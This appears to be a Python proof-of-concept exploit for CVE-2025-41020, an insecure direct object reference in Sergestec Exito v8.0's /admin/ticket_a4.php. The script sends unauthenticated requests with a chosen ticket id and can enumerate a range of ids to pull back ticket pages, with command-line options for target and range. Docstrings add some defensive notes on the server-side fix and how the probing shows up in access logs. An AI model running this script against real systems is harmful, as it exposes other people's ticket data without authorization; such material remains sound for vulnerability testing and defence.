#!/usr/bin/env python3
# CVE-2025-41020 - Sergestec Exito v8.0 IDOR Vulnerability PoC
# Exploit for Insecure Direct Object Reference in /admin/ticket_a4.php
import requests
import sys
import argparse
# Placeholder base URL, used only as the default for -u/--url below.
# Replace it with the address of the Exito instance being assessed.
TARGET_URL = "http://target.com"
def exploit_idor(base_url, ticket_id):
    """
    Fetch one ticket from /admin/ticket_a4.php using the caller-supplied 'id'.

    The request is sent without cookies, headers or any other credentials,
    so a populated reply means the endpoint returned a body for that id to
    an unauthenticated client. The hit test is coarse: any HTTP 200 with a
    non-empty body counts, which a login or error page served with status
    200 would also satisfy. Inspect the body before treating a hit as
    confirmation of the IDOR.

    The fix belongs on the server: the handler should check the requester's
    session and their entitlement to the requested ticket before rendering
    it (the handler itself is not part of this file).

    Args:
        base_url: Scheme and host of the instance, without a trailing path.
        ticket_id: Value sent as the 'id' query parameter.

    Returns:
        The response text on a hit, or None on a non-200 status, an empty
        body, or a requests transport error.
    """
    url = f"{base_url}/admin/ticket_a4.php"
    try:
        # 10 second timeout so an unresponsive host cannot stall the run.
        resp = requests.get(url, params={"id": ticket_id}, timeout=10)
        if resp.status_code != 200 or not resp.text:
            print(f"[-] Ticket ID {ticket_id} - Status: {resp.status_code}")
            return None
        print(f"[+] Ticket ID {ticket_id} - Status: {resp.status_code}")
        print(f"[+] Response length: {len(resp.text)}")
        return resp.text
    except requests.exceptions.RequestException as e:
        # Connection, timeout and protocol failures are reported, not raised.
        print(f"[!] Error: {e}")
        return None
def enumerate_tickets(base_url, start_id=1, end_id=100):
    """
    Probe every ticket id in [start_id, end_id] and collect the hits.

    Each id is sent as its own request through exploit_idor, in ascending
    order and with no delay between requests. In the server's access log
    this shows up as a run of consecutive 'id' values against
    /admin/ticket_a4.php from one client, which is a usable detection
    signal for this class of access-control probing.

    Only bodies longer than 100 characters are kept. The threshold is a
    heuristic for dropping short error or empty pages; it does not prove
    that a kept body contains ticket data.

    Args:
        base_url: Scheme and host of the instance, without a trailing path.
        start_id: First ticket id to request (inclusive).
        end_id: Last ticket id to request (inclusive).

    Returns:
        Dict mapping each ticket id that passed the length filter to its
        response text. Empty when start_id is greater than end_id.
    """
    print(f"[*] Starting enumeration from ID {start_id} to {end_id}")
    found = {}
    for ticket_id in range(start_id, end_id + 1):
        body = exploit_idor(base_url, ticket_id)
        # Skip misses (None) and responses too short to be a rendered ticket.
        if not body or len(body) <= 100:
            continue
        found[ticket_id] = body
        print(f"[+] Found valid data for ticket ID: {ticket_id}")
    return found
if __name__ == "__main__":
    # Command-line entry point: one ticket id by default, or an id range with -r.
    cli = argparse.ArgumentParser(description="CVE-2025-41020 PoC - Sergestec Exito IDOR")
    cli.add_argument("-u", "--url", default=TARGET_URL, help="Target base URL")
    cli.add_argument("-i", "--id", type=int, default=1, help="Specific ticket ID to access")
    cli.add_argument("-r", "--range", action="store_true", help="Enumerate ticket ID range")
    cli.add_argument("-s", "--start", type=int, default=1, help="Start ID for enumeration")
    cli.add_argument("-e", "--end", type=int, default=100, help="End ID for enumeration")
    opts = cli.parse_args()

    # The return values are discarded here, so a run only prints the
    # status lines from the helpers and stores no response bodies.
    if not opts.range:
        exploit_idor(opts.url, opts.id)
    else:
        enumerate_tickets(opts.url, opts.start, opts.end)